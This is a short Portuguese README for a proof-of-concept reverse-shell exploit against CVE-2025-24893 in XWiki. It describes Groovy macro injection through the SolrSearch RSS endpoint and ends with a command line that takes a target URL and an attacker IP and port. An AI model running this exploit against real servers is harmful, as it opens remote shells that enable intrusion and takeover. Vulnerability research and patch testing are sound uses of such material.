
Payload de Reverse Shell para CVE-2025-24893
PoC para CVE-2025-24893 – Execução Remota de Código via Macro
<groovy>do XWiki
Inspirado pelo PoC original de Artemir
Este é um exploit de Prova de Conceito (PoC) para CVE-2025-24893, uma vulnerabilidade de Execução Remota de Código (RCE) em versões vulneráveis do XWiki.
A falha reside na sanitização inadequada da entrada do usuário dentro do endpoint SolrSearch, que é vulnerável à injeção de macro <groovy> sem sandbox através de uma consulta de feed RSS.
Este script injeta um payload Groovy usando a macro async que resulta em execução de comandos no servidor, permitindo que um atacante acione um reverse shell de volta ao seu sistema.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>